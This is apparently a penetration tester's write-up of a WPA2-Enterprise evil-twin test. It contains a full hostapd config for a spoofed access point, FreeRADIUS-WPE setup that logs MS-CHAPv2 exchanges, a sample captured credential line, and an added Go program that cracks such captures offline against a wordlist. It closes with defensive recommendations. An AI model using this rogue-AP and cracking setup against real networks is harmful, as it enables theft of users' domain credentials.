In one of my recent assessments I had to look at some wireless networks at a few locations. I had not done a wireless security assessment in ages, so it was a good exercise to see what's changed, learn about some new authentication protocols and pick up a few new attack vectors.
Everything was run from my Kali installation running on my MacBook via VMware Fusion, and for Wi-Fi I used the Alfa AR9271 wireless USB card (it came with my WiFi Pineapple (: ). Yes, VMware does not pick up the host's built-in Wi-Fi card (the guest only sees a virtual wired NIC, so it cannot put that card into AP or monitor mode), hence the external USB Wi-Fi adapter, which I attached to the guest system, where it is picked up just fine.
All the tools used:
- FreeRADIUS-WPE
- hostapd
- Kali
- asleap
- John the Ripper
The approach taken was to impersonate the access points under test and run your own RADIUS server behind the fake access point to capture the authentication exchange. What you capture is not a stored password hash as such but the MS-CHAPv2 challenge and response of each client; since the response is computed from the NT hash of the user's password, it can be cracked offline, using either asleap or, as I found out and worked better for me, John the Ripper.
Essentially you run hostapd to impersonate the access point (same SSID, WPA2-Enterprise) and a patched FreeRADIUS server to handle the authentication; by "handle" I mean log the challenge and response of every client that tries to authenticate to your spoofed access point. This works because the client accepts the rogue server's TLS certificate (or never checks it) and then runs its inner MS-CHAPv2 exchange against your server; see the recommendations at the end.
FreeRADIUS-WPE
The first step is to download, compile and install FreeRADIUS Wireless Pwnage Edition (WPE), a patched FreeRADIUS that logs the credentials (for MS-CHAPv2, the challenge and response) from every authentication request it receives:
- https://github.com/brad-anton/freeradius-wpe
The log which contains the captured challenge/response pairs is located here:
- /usr/local/var/log/radius/freeradius-server-wpe.log
HostAP
Now that FreeRADIUS is installed, make sure hostapd is installed and working. If you don't have it, you can find a copy here:
- http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
Save the following as wpe-test.conf. In a real engagement the ssid (and security type) must match the access point you are impersonating so that clients with a saved profile for it will associate, and auth_server_shared_secret must match the secret for 127.0.0.1 in FreeRADIUS's clients.conf (testing123 is the shipped default):
interface=wlan0
driver=nl80211
ssid=SpooFed4cc3sspoint
country_code=ZA
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=CCMP
rsn_pairwise=CCMP
Command (-dd gives verbose debug output, useful for watching clients associate and EAP start):
- hostapd -dd wpe-test.conf
Then enable the NT-domain workaround in the mschap module, since Windows clients send DOMAIN\user as the username but compute their response over the bare account name:
- /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes
Start radiusd (running it in the foreground with radiusd -X is the easiest way to see what it is doing) and watch the WPE log. Each authentication attempt against the spoofed access point produces an entry like the one below; the last line repeats the same challenge and response in the format john reads:
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
mschap: Mon Feb 1 12:15:52 2014
	 username: domain\testuser
	 challenge: ab:bb:dd:c6:a1:13:53:dd
	 response: de:14:c8:a8:7e:ce:53:53:04:f8:a0:75:ce:53:53:ca:70:35:e1:e6:21:0c:f1:b6
	 john NETNTLM: domain\testuser:$NETNTLM$abbbddc6a11353dd$de14c8a87ece535304f8a075ce5353ca7035e1e6210cf1b6
Cracking the captured Credentials
Here you can use either asleap or, in my case, John. I didn't have a large enough wordlist at the time of the assessment to use with asleap (wordlist-based cracking). John supports the captured WPE hashes in its netntlm format, and WPE already writes each capture in that format on the "john NETNTLM" line, so simply collect those lines into a file and run john against it. Note that what is being cracked is not a stored hash but an MS-CHAPv2 challenge/response: the right password is the one whose NT hash, run through the three DES operations of MS-CHAPv2 on the logged challenge, reproduces the logged response. Every guess therefore costs one MD4 and three DES encryptions, and there is no salt to slow a wordlist down.
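To show concretely what the log entry contains and why it cracks offline, here is an added example in Go; it is not code from the original post, from FreeRADIUS-WPE or from John the Ripper, and the function names are mine. It derives the 8-byte challenge the way the RADIUS server does (which is where the user name, and hence with_ntdomain_hack, enters), recomputes the MS-CHAPv2 NT-Response from a candidate password exactly as the client does, and runs a small constructed wordlist against a capture. The RFC 2759 section 9.2 test vector (user "User", password "clientPass") stands in for a captured exchange so the result can be checked against the RFC; the DOMAIN\User identity in the printed john line is illustrative only.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// md4 is a compact MD4 (RFC 1320); Go's standard library does not ship one.
func md4(data []byte) []byte {
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	msg := append(append([]byte{}, data...), 0x80) // padding: 0x80, zeros, 64-bit bit length
	msg = append(msg, make([]byte, (119-len(data)%64)%64+8)...)
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	rotl := func(x uint32, s uint) uint32 { return x<<s | x>>(32-s) }
	r3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F, message words in order
			a, d, c, b = d, c, b, rotl(a+((b&c)|(^b&d))+x[i], []uint{3, 7, 11, 19}[i%4])
		}
		for i := 0; i < 16; i++ { // round 2: G (majority), words column-wise
			a, d, c, b = d, c, b, rotl(a+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, []uint{3, 5, 9, 13}[i%4])
		}
		for i := 0; i < 16; i++ { // round 3: H (xor), words in r3 order
			a, d, c, b = d, c, b, rotl(a+(b^c^d)+x[r3[i]]+0x6ed9eba1, []uint{3, 9, 11, 15}[i%4])
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	out := make([]byte, 16)
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ChallengeHash is the 8-byte challenge WPE logs (RFC 2759): the first 8 bytes of
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName). Windows hashes only the
// account name here even when its identity was DOMAIN\user; with_ntdomain_hack covers that.
func ChallengeHash(peer, auth []byte, user string) []byte {
	sum := sha1.Sum(append(append(append([]byte{}, peer...), auth...), user...))
	return sum[:8]
}

// NTResponse recomputes the 24-byte NT-Response for a candidate password: the NT hash
// (MD4 of the UTF-16LE password, no salt) zero-padded to 21 bytes and cut into three
// 7-byte DES keys, each encrypting the same 8-byte challenge.
func NTResponse(challenge []byte, password string) []byte {
	var pw []byte
	for _, u := range utf16.Encode([]rune(password)) {
		pw = append(pw, byte(u), byte(u>>8))
	}
	padded := make([]byte, 21)
	copy(padded, md4(pw))
	var resp []byte
	for i := 0; i < 3; i++ {
		n := binary.BigEndian.Uint64(append([]byte{0}, padded[7*i : 7*i+7]...))
		key := make([]byte, 8)
		for j := range key { // 7 key bits per byte, low bit left for DES parity
			key[j] = byte(n>>(49-7*uint(j))&0x7f) << 1
		}
		block, _ := des.NewCipher(key)
		out := make([]byte, 8)
		block.Encrypt(out, challenge)
		resp = append(resp, out...)
	}
	return resp
}

// Crack is the offline step: recompute the response for each candidate and compare.
func Crack(challenge, response []byte, wordlist []string) (string, bool) {
	for _, w := range wordlist {
		if bytes.Equal(NTResponse(challenge, w), response) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// RFC 2759 section 9.2 test vector (user "User", password "clientPass") in place of a capture.
	auth, _ := hex.DecodeString("5b5d7c7d7b3f2f3e3c2c602132262628")
	peer, _ := hex.DecodeString("21402324255e262a28295f2b3a337c7e")
	response, _ := hex.DecodeString("82309ecd8d708b5ea08faa3981cd83544233114a3d85d6df")
	challenge := ChallengeHash(peer, auth, "User")
	fmt.Printf("john NETNTLM: %s:$NETNTLM$%x$%x\n", `domain\User`, challenge, response)
	fmt.Println(Crack(challenge, response, []string{"Password1", "Winter2014", "clientPass"})) // clientPass true
}
```

Run it with go run; it prints the john NETNTLM line for the vector and then clientPass true. Real captures go to john with --format=netntlm. The takeaway is the cost per guess: one MD4 and three DES encryptions, with no salt and no iteration, so the same wordlists and rules that work against NT hashes apply unchanged to these captures.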
*Remember this is only for use on networks you are authorised to test, and I hold no responsibility should you use this for malicious means.
Some recommendations:
- Users should be vigilant about the networks they connect to. In the above attack I found that most mobile devices happily connected to the "spoofed" access point with no issues; however, my MacBook and Windows picked up that the certificate did not match and prompted the user with a warning, although some users continued the connection after the prompt (: So user awareness is important, but there is no patch for human stupidity!
- I don't think using domain credentials for authentication over the wireless network is the best idea. Yes, it's practical, but you are potentially broadcasting those hashes to the world and it's not that hard to crack them, and who knows where else you can reuse the credentials to obtain further access. So I would suggest a separate set of credentials for wireless authentication.
Other Wi-Fi tools for Mac OS X that I came across:
iStumbler for Mac - http://istumbler.net/
Kismac 2 - https://github.com/IGRSoft/KisMac2